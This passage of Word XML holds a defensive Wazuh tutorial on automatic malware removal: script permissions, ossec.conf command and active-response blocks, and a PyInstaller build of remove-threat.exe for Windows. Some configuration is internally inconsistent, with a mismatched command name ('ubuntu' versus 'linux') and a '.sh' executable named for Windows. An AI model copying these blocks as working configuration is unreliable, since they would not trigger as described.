            <w:r w:rsidRPr="0011181E">
              <w:t xml:space="preserve"> echo "`date '+%Y/%m/%d %H:%M:%S'` $0: $INPUT_JSON Error removing threat" &gt;&gt; ${LOG_FILE}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DD010C8" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t>fi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3220D513" w14:textId="77777777" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5EF3C12F" w14:textId="309AFCAA" w:rsidR="00DF4440" w:rsidRPr="0011181E" w:rsidRDefault="00DF4440" w:rsidP="0011181E">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="0011181E">
              <w:t>exit 0;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26228B9B" w14:textId="77777777" w:rsidR="000812CB" w:rsidRDefault="000812CB" w:rsidP="00AA1E25">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03643E24" w14:textId="2EDB1788" w:rsidR="00AA1E25" w:rsidRPr="00AA1E25" w:rsidRDefault="00AA1E25" w:rsidP="00AA1E25">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1E25">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>4- Change the /var/ossec/active-response/bin/remove-threat.sh file ownership, and permission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A1E25" w:rsidRPr="001E2C55" w14:paraId="53A57920" w14:textId="77777777" w:rsidTr="00AA1E25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7F647704" w14:textId="77777777" w:rsidR="00AA1E25" w:rsidRPr="00AA1E25" w:rsidRDefault="00AA1E25" w:rsidP="00AA1E25">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AA1E25">
              <w:t>sudo chmod 750 /var/ossec/active-response/bin/remove-threat.sh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D0D55E9" w14:textId="744E096C" w:rsidR="00AA1E25" w:rsidRPr="00AA1E25" w:rsidRDefault="00AA1E25" w:rsidP="00AA1E25">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AA1E25">
              <w:t>sudo chown root:wazuh /var/ossec/active-response/bin/remove-threat.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70885026" w14:textId="01170CE6" w:rsidR="00AA1E25" w:rsidRDefault="00AA1E25" w:rsidP="00B719CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="085B22D7" w14:textId="3CC2E86A" w:rsidR="00F8013D" w:rsidRPr="00F8013D" w:rsidRDefault="00F8013D" w:rsidP="00B719CC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F8013D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">5- In Wazuh server ossec.conf add </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F8013D" w14:paraId="15014600" w14:textId="77777777" w:rsidTr="00F8013D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="48933F19" w14:textId="77777777" w:rsidR="00F8013D" w:rsidRPr="00F8013D" w:rsidRDefault="00F8013D" w:rsidP="00F8013D">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F8013D">
              <w:t>&lt;command&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53E87387" w14:textId="575D6F94" w:rsidR="00F8013D" w:rsidRPr="00F8013D" w:rsidRDefault="00F8013D" w:rsidP="00F8013D">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F8013D">
              <w:t xml:space="preserve">  &lt;name&gt;remove-threat</w:t>
            </w:r>
            <w:r w:rsidR="004F3236">
              <w:t>-ubuntu</w:t>
            </w:r>
            <w:r w:rsidRPr="00F8013D">
              <w:t>&lt;/name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17A4ECE5" w14:textId="77777777" w:rsidR="00F8013D" w:rsidRPr="00F8013D" w:rsidRDefault="00F8013D" w:rsidP="00F8013D">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F8013D">
              <w:t xml:space="preserve">  &lt;executable&gt;remove-threat.sh&lt;/executable&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D20C16B" w14:textId="77777777" w:rsidR="00F8013D" w:rsidRPr="00F8013D" w:rsidRDefault="00F8013D" w:rsidP="00F8013D">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F8013D">
              <w:t xml:space="preserve">  &lt;timeout_allowed&gt;no&lt;/timeout_allowed&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59BF2528" w14:textId="5CA8F080" w:rsidR="00F8013D" w:rsidRDefault="00F8013D" w:rsidP="00F8013D">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F8013D">
              <w:t>&lt;/command&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F7457D7" w14:textId="3FBB1D2D" w:rsidR="00F8013D" w:rsidRDefault="00F8013D" w:rsidP="00B719CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A328EF" w14:textId="3A5C34D5" w:rsidR="000812CB" w:rsidRPr="000812CB" w:rsidRDefault="000812CB" w:rsidP="00B719CC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000812CB">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">And </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0812CB" w14:paraId="522B1FB1" w14:textId="77777777" w:rsidTr="000812CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="607C5C5A" w14:textId="77777777" w:rsidR="000812CB" w:rsidRPr="000812CB" w:rsidRDefault="000812CB" w:rsidP="000812CB">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="000812CB">
              <w:t>&lt;active-response&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DEFDA84" w14:textId="77777777" w:rsidR="000812CB" w:rsidRPr="000812CB" w:rsidRDefault="000812CB" w:rsidP="000812CB">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="000812CB">
              <w:t xml:space="preserve">    &lt;disabled&gt;no&lt;/disabled&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="159EAA0F" w14:textId="77777777" w:rsidR="000812CB" w:rsidRPr="000812CB" w:rsidRDefault="000812CB" w:rsidP="000812CB">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="000812CB">
              <w:t xml:space="preserve">    &lt;command&gt;remove-threat-linux&lt;/command&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02EECC75" w14:textId="77777777" w:rsidR="000812CB" w:rsidRPr="000812CB" w:rsidRDefault="000812CB" w:rsidP="000812CB">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="000812CB">
              <w:t xml:space="preserve">    &lt;location&gt;local&lt;/location&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E26512A" w14:textId="77777777" w:rsidR="000812CB" w:rsidRPr="000812CB" w:rsidRDefault="000812CB" w:rsidP="000812CB">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="000812CB">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    &lt;rules_id&gt;100201&lt;/rules_id&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="040F187D" w14:textId="3F0475A0" w:rsidR="000812CB" w:rsidRDefault="000812CB" w:rsidP="000812CB">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="000812CB">
              <w:t>&lt;/active-response&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D65DD49" w14:textId="77777777" w:rsidR="000812CB" w:rsidRPr="00F8013D" w:rsidRDefault="000812CB" w:rsidP="00B719CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20531480" w14:textId="0F1C9DA4" w:rsidR="00630B67" w:rsidRDefault="00F8013D" w:rsidP="00B719CC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00630B67" w:rsidRPr="00630B67">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>- sudo systemctl restart wazuh-agent</w:t>
      </w:r>
      <w:r w:rsidR="000812CB">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> and wazuh serv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6D35A7" w:rsidRPr="001E2C55" w14:paraId="5CD61FB9" w14:textId="77777777" w:rsidTr="006D35A7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1D8D9D3E" w14:textId="191A71DD" w:rsidR="003C0B24" w:rsidRDefault="006D35A7" w:rsidP="006D35A7">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="006D35A7">
              <w:t>sudo systemctl restart wazuh-agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="630133BF" w14:textId="77777777" w:rsidR="00630B67" w:rsidRDefault="00630B67" w:rsidP="00B719CC">
      <w:pPr>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C2F48" w14:paraId="400E3B50" w14:textId="77777777" w:rsidTr="00EC2F48">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2370F907" w14:textId="14F913CE" w:rsidR="00EC2F48" w:rsidRDefault="00EC2F48" w:rsidP="00EC2F48">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="009E633B">
              <w:t>systemctl restart wazuh-manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="737FCF29" w14:textId="77777777" w:rsidR="003C0B24" w:rsidRDefault="003C0B24" w:rsidP="00B719CC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="331E79C9" w14:textId="38A2EC30" w:rsidR="00AC61CB" w:rsidRPr="00630B67" w:rsidRDefault="00AC61CB" w:rsidP="00B719CC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DB2EA99" wp14:editId="683E4ECF">
            <wp:extent cx="6644640" cy="2468880"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="5004434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640" cy="2468880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D0B9BA" w14:textId="77777777" w:rsidR="00EC2F48" w:rsidRDefault="00B719CC" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00036E1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Detecting and removing malware using VirusTotal integration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254077EE" w14:textId="42970CBE" w:rsidR="00AE4264" w:rsidRDefault="009502B4" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00561659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>In Windows</w:t>
      </w:r>
      <w:r w:rsidR="00561659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1047F24E" w14:textId="24954F23" w:rsidR="00561659" w:rsidRPr="00561659" w:rsidRDefault="00561659" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>1- I</w:t>
      </w:r>
      <w:r w:rsidRPr="00561659">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>n the Wazuh agent C:\Program Files (x86)\ossec-agent\ossec.conf file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> we have to</w:t>
      </w:r>
      <w:r w:rsidRPr="00561659">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00561659">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ake sure that &lt;disabled&gt; is set to no</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5847D01B" w14:textId="4E855ABB" w:rsidR="00561659" w:rsidRPr="00561659" w:rsidRDefault="00561659" w:rsidP="00561659">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">2- </w:t>
      </w:r>
      <w:r w:rsidRPr="00561659">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Download the Python executable installer from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00561659">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>official Python website</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00561659">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56078DC6" w14:textId="2955D8A8" w:rsidR="00561659" w:rsidRPr="00561659" w:rsidRDefault="00561659" w:rsidP="00561659">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">3- </w:t>
      </w:r>
      <w:r w:rsidRPr="00561659">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the Python installer </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0B1935" w14:textId="5D6580F7" w:rsidR="00561659" w:rsidRPr="00561659" w:rsidRDefault="00561659" w:rsidP="00561659">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">4- </w:t>
      </w:r>
      <w:r w:rsidRPr="00561659">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Once Python completes the installation process open an administrator PowerShell terminal and use pip to install PyInstall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561659" w14:paraId="04599429" w14:textId="77777777" w:rsidTr="00561659">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4BD340AB" w14:textId="77777777" w:rsidR="00561659" w:rsidRPr="00561659" w:rsidRDefault="00561659" w:rsidP="00561659">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00561659">
              <w:t>pip install pyinstaller</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16EC5A86" w14:textId="1BFA6E8A" w:rsidR="00561659" w:rsidRPr="00561659" w:rsidRDefault="00561659" w:rsidP="00561659">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00561659">
              <w:t>pyinstaller --version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5904DE7C" w14:textId="77777777" w:rsidR="00EC2F48" w:rsidRDefault="00EC2F48" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51730A9E" w14:textId="2DC0D053" w:rsidR="00A92921" w:rsidRDefault="00561659" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">5- </w:t>
      </w:r>
      <w:r w:rsidRPr="00561659">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Create an active response script remove-threat.py to remove a file from the Windows endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F02B860" w14:textId="14DF2026" w:rsidR="00561659" w:rsidRDefault="003643EA" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">6- </w:t>
      </w:r>
      <w:r w:rsidRPr="003643EA">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Convert the active response Python script remove-threat.py to a Windows executable application</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3643EA" w:rsidRPr="001E2C55" w14:paraId="7A9BC156" w14:textId="77777777" w:rsidTr="003643EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="17D8FE2D" w14:textId="002B7141" w:rsidR="003643EA" w:rsidRDefault="003643EA" w:rsidP="003643EA">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="003643EA">
              <w:t>pyinstaller -F \path_to_remove-threat.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5FD00428" w14:textId="77777777" w:rsidR="00EC2F48" w:rsidRDefault="00EC2F48" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B86996E" w14:textId="03048787" w:rsidR="003643EA" w:rsidRDefault="00EC2F48" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">7- Make sure that remove-threat.exe is in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2F48">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>C:\Program Files (x86)\ossec-agent\active-response\bin directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6278333F" w14:textId="77777777" w:rsidR="00AC61CB" w:rsidRDefault="00AC61CB" w:rsidP="00EC2F48">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D5B71B2" w14:textId="77777777" w:rsidR="00AC61CB" w:rsidRDefault="00AC61CB" w:rsidP="00EC2F48">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7434865B" w14:textId="1825A94F" w:rsidR="00AC61CB" w:rsidRPr="00F8013D" w:rsidRDefault="00EC2F48" w:rsidP="00EC2F48">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>8-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F8013D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> In Wazuh server ossec.conf add </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C2F48" w14:paraId="11E22317" w14:textId="77777777" w:rsidTr="00577778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="200C3CBF" w14:textId="77777777" w:rsidR="00EC2F48" w:rsidRPr="00F8013D" w:rsidRDefault="00EC2F48" w:rsidP="005B42BD">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F8013D">
              <w:t>&lt;command&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="108320E4" w14:textId="0345A0B7" w:rsidR="00EC2F48" w:rsidRPr="00F8013D" w:rsidRDefault="00EC2F48" w:rsidP="005B42BD">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F8013D">
              <w:t xml:space="preserve">  &lt;name&gt;remove-threat</w:t>
            </w:r>
            <w:r>
              <w:t>-windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00F8013D">
              <w:t>&lt;/name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11917278" w14:textId="77777777" w:rsidR="00EC2F48" w:rsidRPr="00F8013D" w:rsidRDefault="00EC2F48" w:rsidP="005B42BD">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F8013D">
              <w:t xml:space="preserve">  &lt;executable&gt;remove-threat.sh&lt;/executable&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13E11C72" w14:textId="77777777" w:rsidR="00EC2F48" w:rsidRPr="00F8013D" w:rsidRDefault="00EC2F48" w:rsidP="005B42BD">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F8013D">
              <w:t xml:space="preserve">  &lt;timeout_allowed&gt;no&lt;/timeout_allowed&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E0CF364" w14:textId="77777777" w:rsidR="00EC2F48" w:rsidRDefault="00EC2F48" w:rsidP="005B42BD">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F8013D">
              <w:t>&lt;/command&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00577778" w14:paraId="5F4B70A0" w14:textId="77777777" w:rsidTr="00577778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="605586FE" w14:textId="77777777" w:rsidR="00577778" w:rsidRPr="000812CB" w:rsidRDefault="00577778" w:rsidP="005B42BD">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="000812CB">
              <w:t>&lt;active-response&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C28A11A" w14:textId="77777777" w:rsidR="00577778" w:rsidRPr="000812CB" w:rsidRDefault="00577778" w:rsidP="005B42BD">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="000812CB">
              <w:t xml:space="preserve">    &lt;disabled&gt;no&lt;/disabled&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DB952B0" w14:textId="77777777" w:rsidR="00577778" w:rsidRPr="000812CB" w:rsidRDefault="00577778" w:rsidP="005B42BD">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="000812CB">
              <w:t xml:space="preserve">    &lt;command&gt;remove-threat-</w:t>
            </w:r>
            <w:r>
              <w:t>windows</w:t>
            </w:r>
            <w:r w:rsidRPr="000812CB">
              <w:t>&lt;/command&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59A60786" w14:textId="77777777" w:rsidR="00577778" w:rsidRPr="000812CB" w:rsidRDefault="00577778" w:rsidP="005B42BD">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="000812CB">
              <w:t xml:space="preserve">    &lt;location&gt;local&lt;/location&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="517B747F" w14:textId="77777777" w:rsidR="00577778" w:rsidRPr="000812CB" w:rsidRDefault="00577778" w:rsidP="005B42BD">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="000812CB">
              <w:t xml:space="preserve">    &lt;rules_id&gt;100201&lt;/rules_id&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08311DA8" w14:textId="77777777" w:rsidR="00577778" w:rsidRDefault="00577778" w:rsidP="005B42BD">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="000812CB">
              <w:t>&lt;/active-response&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4573BDA1" w14:textId="77777777" w:rsidR="00AC61CB" w:rsidRDefault="00AC61CB" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FC9B9F0" w14:textId="71F7AB4E" w:rsidR="00A92921" w:rsidRDefault="00EC2F48" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>8- Restart Wazuh Agent</w:t>
      </w:r>
